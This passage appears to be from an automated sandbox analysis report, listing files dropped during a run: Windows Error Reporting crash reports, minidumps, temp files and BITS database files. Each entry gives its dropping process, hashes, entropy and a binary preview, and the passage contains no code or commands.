                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x603b5b2a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                                Entropy (8bit):0.7217441453477474
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:7SB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:7azaNvFv8V2UW/DLzN/w4wZi
                                                                                                                                                                                                                                MD5:C1D5C180CB1CB1223E016FF7AAEA0307
                                                                                                                                                                                                                                SHA1:2BFFAD249B443E68575D646A986BD121657A9541
                                                                                                                                                                                                                                SHA-256:F7C429D6CDED500B231F7CF3FA23F5AD1178E5A31756BE087DF356B561A4381E
                                                                                                                                                                                                                                SHA-512:B8320C2D9DB0A17C17D61EF5461C9436BBF3D6E69B5944AB7C14EA2C75AFA95856E33B63B092540E49A94E956DAE55D2FC8B5968EA54BFFFB7A74674EF56EDCE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:`;[*... ...............X\...;...{......................p.D..........{}.."...|..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{....................................sK."...|..................P...."...|...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                                Entropy (8bit):0.08190995526317563
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:V3m1KYefEXr/fgsCrZClW/t/vQ/loll+SHY/Xl+/rQLve:dyKzfkfgs3G5lAS4M
                                                                                                                                                                                                                                MD5:AD631FC9955E0484367286CB7BA119B6
                                                                                                                                                                                                                                SHA1:BEC7ED41EE0C6122F2DB5329FDACBC829E2D1DF5
                                                                                                                                                                                                                                SHA-256:41FF27131E2E2D4802322535746329EDE55E5F5C286677A232AB4A62D3656C93
                                                                                                                                                                                                                                SHA-512:D170C47DBBE981A5640587FC738A7F0DD552C94D20648F39CE9F063A6A23AE599E00593F7D8DA046DE46E80212CD7AAFE922B081D4A8E22B0A78C9395327AA63
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..-......................................;...{..."...|.......{}..............{}......{}.vv_Q.....{}.................P...."...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_fdaf952c6ee1f88ce61d4ef9ce9cd9371241b46_53670341_f3b04109-ee8e-499e-9aa0-d4d311b54cd2\Report.wer

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                Entropy (8bit):0.7982135926600462
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:BCXPeFy/l+t0NXffjezqzuiFlZ24IO8Z:wXxl+uNXffje+zuiFlY4IO8Z
                                                                                                                                                                                                                                MD5:E2684671D0F3ECC337349FED11C25727
                                                                                                                                                                                                                                SHA1:0653EE2A62F9E4759A5E653E854272C0EF955ABC
                                                                                                                                                                                                                                SHA-256:16822F9DAFB9B3B34BE91EA7089DA228CFAC8F71655B3EFA6E12169B760AA389
                                                                                                                                                                                                                                SHA-512:3225D194C2B6D0D9006D12DA1F0C23A9B04F436760B86F7420346D202DAB1EB159108C8A74E6925F242678160D367DA892137AC78E07499649C865166DA59F66
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.3.9.2.0.4.7.9.8.1.6.0.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.3.9.2.0.5.2.6.5.5.8.1.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.3.b.0.4.1.0.9.-.e.e.8.e.-.4.9.9.e.-.9.a.a.0.-.d.4.d.3.1.1.b.5.4.c.d.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.e.8.0.7.8.4.-.2.e.b.a.-.4.f.f.1.-.a.e.8.6.-.b.b.3.1.e.8.9.5.a.2.8.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.a.c.-.0.0.0.1.-.0.0.1.4.-.f.4.3.d.-.0.b.2.a.1.a.0.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_aFBKY19rLrQU72E1_fc105471cef84487b44080df0205da33d536d30_4ec521f5_611fbc71-65ee-48c1-a334-dece158e2bc3\Report.wer

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                Entropy (8bit):0.8875203799715151
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:XZFMqOKCH0bzMldvxKb3UQXIDcQvc6QcEVcw3cE/j0u0a+BHUHZ0ownOgHkEwH3P:p6gCfs0BU/HviaGgzuiFlZ24IO8+oi0
                                                                                                                                                                                                                                MD5:EBE264F828FAAC6949D753809559C18A
                                                                                                                                                                                                                                SHA1:E6FC5BD00AF88A4B0CC487E6259F0392160CA3A9
                                                                                                                                                                                                                                SHA-256:FFAA2C719E8DAD985287AD670C27E909F729DE62EEFD77485FB6A692C817D544
                                                                                                                                                                                                                                SHA-512:60F46CCA43970E9DE2BE1086A4AA6110F79CFDA062A898C54F2CA3620BAA1DA5F7C6D20E90F230428699C54DF2A4466721CDF634D445EAC24869CB06E4281D5C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.3.9.2.0.4.6.4.1.2.1.3.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.3.9.2.0.5.1.8.6.8.4.6.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.1.1.f.b.c.7.1.-.6.5.e.e.-.4.8.c.1.-.a.3.3.4.-.d.e.c.e.1.5.8.e.2.b.c.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.3.5.2.d.b.e.-.5.1.c.e.-.4.d.4.8.-.a.b.d.c.-.c.2.e.1.d.d.3.a.c.5.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.F.B.K.Y.1.9.r.L.r.Q.U.7.2.E.1.4.d.u.4.W.C.P.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.2.4.-.0.0.0.1.-.0.0.1.4.-.2.0.7.8.-.1.2.2.7.1.a.0.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.5.b.2.9.1.7.9.d.1.2.9.6.e.4.a.a.d.6.6.8.0.e.1.0.b.a.2.8.2.4.b.0.0.0.0.0.0.0.0.!.0.0.0.0.a.c.0.f.8.c.8.4.1.d.1.9.7.a.3.d.b.3.6.8.a.3.c.6.4.6.d.2.4.2.5.4.1.e.c.e.1.4.4.b.!.a.F.B.K.Y.1.9.r.L.r.Q.U.

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wg6F73wLMGz6xXFA_f2fcf5f55f35e29a9b74be3e513cbbba1e1952_0334d0b6_11a6b3d8-c999-4e35-85fe-98ee9964c048\Report.wer

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                Entropy (8bit):0.9035204268680191
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:g4RAATIDop0fwFvyWy0tM/BgSghaGgzuiFKZ24IO81gR:gcAXFy6ItM/IaZzuiFKY4IO88
                                                                                                                                                                                                                                MD5:B004D43F6BE5EB406AD3F7BEE4E4A3EA
                                                                                                                                                                                                                                SHA1:3C1C4F1B45C71694E00317A26B92DD614834586D
                                                                                                                                                                                                                                SHA-256:433A1B169CB2956BE7F9A1F68743C6CF2AB9FC743102B2E9CAC10080BB08F6EE
                                                                                                                                                                                                                                SHA-512:051968A7DA4890167A5241DE47F0FFC875C9709FDDFF9CC4838078BCE1A8370C213CDE9DE9439763452E9A43A91B9E7F1838DBCD2C43C5CA20A64B5B7EFA5A1F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.3.9.2.0.4.8.5.5.4.6.8.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.a.6.b.3.d.8.-.c.9.9.9.-.4.e.3.5.-.8.5.f.e.-.9.8.e.e.9.9.6.4.c.0.4.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.e.0.b.1.b.8.-.4.2.d.7.-.4.e.2.a.-.a.5.5.9.-.b.7.4.1.6.f.1.c.2.7.9.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.w.g.6.F.7.3.w.L.M.G.z.6.x.X.F.A.1.4.w._.o.l.C.U...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.V.Q.P...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.e.c.-.0.0.0.1.-.0.0.1.4.-.c.8.4.6.-.1.b.2.7.1.a.0.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.a.1.d.7.5.e.4.2.d.4.f.e.c.3.2.a.a.8.f.1.2.e.9.f.b.e.e.1.c.6.2.0.0.0.0.0.0.0.0.!.0.0.0.0.0.d.f.c.c.f.2.3.5.d.c.6.2.d.2.5.9.2.f.5.0.6.2.a.1.b.9.6.9.1.0.4.3.c.1.4.c.c.9.e.!.w.g.6.F.7.3.w.L.M.G.z.6.x.X.F.A.1.4.w._.o.l.C.U...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER132C.tmp.csv

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):92078
                                                                                                                                                                                                                                Entropy (8bit):3.109012259262518
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:vAKbV9dXLuiKqspQXZ+948z/+nv6+vvU+O+ZX2+YN+ZyI+z+6StB9w+t9+6BZE+2:vAKbV9dXLuiKqspQXZ+9Bz/+nv6+vvU9
                                                                                                                                                                                                                                MD5:DD30C0450D8A157322F18151FD38F20E
                                                                                                                                                                                                                                SHA1:7759EA54B62BB94D916D9FD80F7D89F4522A79D8
                                                                                                                                                                                                                                SHA-256:C8D2D375B661AF0A6F011BA273B62B255C3B4A3D033EBA4C484BDFE50A80D6B0
                                                                                                                                                                                                                                SHA-512:B69B0D2AC41089AB11D9E890BCEF07D3F6F6183361FE5359F5F27E58BF3ADE1DAF2063CA6A09F8860BCD606F8BBDDDF68DAACA463C972102EF82109D94702004
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER14A4.tmp.txt

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                Entropy (8bit):2.6985330085835817
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:TiZYW36oTFhkyY8YchGZHlYEZ/YM0tdiwM2Ltwu51GHa0pvMGTwIjuz:2ZD3Wy7hV58Ha0pvMGTHjuz
                                                                                                                                                                                                                                MD5:D98AEB9FC16D0711CA778A325012DC35
                                                                                                                                                                                                                                SHA1:43639EE2FB757EBCFF09D519EB6FB03EA18EB92F
                                                                                                                                                                                                                                SHA-256:5963BE57250A7F77B874B0A25D8DB8A8075E36CA49E160FAB0C736A7E76BBE90
                                                                                                                                                                                                                                SHA-512:DC6724841FB2E7DFEC32FF9FE9C92438AD2E08D2F8D9F7803F6FFC897C0DD2221A4745DED099FF42EF6371F091366410634C4D5FFE1A46D9F1CC40DD74910E53
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D9A.tmp.csv

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):92214
                                                                                                                                                                                                                                Entropy (8bit):3.109634171026565
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:Po6O7v6PBMSnBhHyYHaHh8O/+cvm+7v++y+leA+ar+5ek+a+m+teoG+r7+3k/T+U:Po6O7v6PBMSnBhHyYHaHKO/+cvm+7v+y
                                                                                                                                                                                                                                MD5:2F50B4DD303A41EFCBD524C6C0AEF231
                                                                                                                                                                                                                                SHA1:5E35D0D314B4A73F3B9E559011E0E0F906DFB287
                                                                                                                                                                                                                                SHA-256:6A0E910413AE123DF1BA826BE452DADD343E14CD1D85B110C48DBF8725C454FD
                                                                                                                                                                                                                                SHA-512:D1351FB55635D511CF0C07D457C5CE62C448E2B376698270B8B5E51C7F105721956A35F436798A1838F1AB91263053BDA564FC5EB71EC93B1BC5866133821E90
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4711.tmp.txt

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                Entropy (8bit):2.698639922210599
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:TiZYW3NzrezAwYzZYl5W4B0HiYEZSYtdixMPDm/wXxu2uKappZMBTKI9uE:2ZD3KiZgWKVxZuKappZMBT99uE
                                                                                                                                                                                                                                MD5:76533F242A5D163E46768FD785976622
                                                                                                                                                                                                                                SHA1:FE9A43545DB1537C2CFDC5E32D24CADE87899656
                                                                                                                                                                                                                                SHA-256:3B4A6E0FF20878BF5B1BE3D76EEAB1EC12C703328647F6910DE2813752BCF467
                                                                                                                                                                                                                                SHA-512:316F2218EF6413CCF5A9EB1AC472CEA46790D9C9E36BCC52F2A8FD636F6BB59FCC75CDC0B6A0EDFEF4EEDCC85C5653FC468BB8FEA1E1C349B525EF6D26755BB1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER8E09.tmp.dmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Sat Sep 21 11:34:07 2024, 0x1205a4 type
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):168494
                                                                                                                                                                                                                                Entropy (8bit):3.7238446887815324
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:l7H4YFeODXVRYCDynw2GpN4uE2aOQ89AcrLTgPQXhmG8/1fSHi:lkoRTyw2Q4uEqQ86crLTgIXwGGJSHi
                                                                                                                                                                                                                                MD5:8C3357770FAB6ED8572259081433E9FC
                                                                                                                                                                                                                                SHA1:F0CA10B80C0A99D8A7CBE8896968E238F2909946
                                                                                                                                                                                                                                SHA-256:6BE7B1177C268870BA848C2D6DABF6F718484AF442BB8AD8BC064C9498EF3393
                                                                                                                                                                                                                                SHA-512:2EADC77286F15A78ED557E201508346073E2EE44F0688157E85470666F926FBCB197FD3D09093516CE7F8EB9D08A5845DB1DA6DE644A033843F9DB66C2CA4BA6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MDMP..a..... ......./..f........................\...........$...........4 ..67..........`.......8...........T............"..no......................................................................................................eJ..............GenuineIntel............T.......$...(..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER9404.tmp.dmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Sat Sep 21 11:34:08 2024, 0x1205a4 type
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):27266
                                                                                                                                                                                                                                Entropy (8bit):2.2197540777550886
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:5m8u8po2y5lfXsnY1RVMWpm2li75I4vrOAllBPEGTARgLNhJ7qWI/WIKd04IZO/A:fvpiyWpvO5HTlpy+LVzKO32qeu
                                                                                                                                                                                                                                MD5:E64C278FE98E0CF71641165C65B4571B
                                                                                                                                                                                                                                SHA1:1A363F527F3A204529F7D274FA90047667D33E51
                                                                                                                                                                                                                                SHA-256:10402A8B07B70662EDE19C0DFBEBE0F014CBC28CE73A1FD3CB83E3278101C542
                                                                                                                                                                                                                                SHA-512:08C7266685BF3667A7C44EFBF370885F45890DB5570EB3F02EBB12F62117CEBD15CE7C191671067E679C8BBE3EEB6D46215C5C99A1D53B94E1F76BD2E4A79E5A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MDMP..a..... .......0..f............4...............<.......d...4...........T.......8...........T................T......................................................................................................eJ..............GenuineIntel............T...........-..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER952E.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):8434
                                                                                                                                                                                                                                Entropy (8bit):3.699651825888485
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJOv6K6Yq76MgmfZy/pr789bbMsfdWJm:R6lXJW6K6Y+6Mgmfo+bffdp
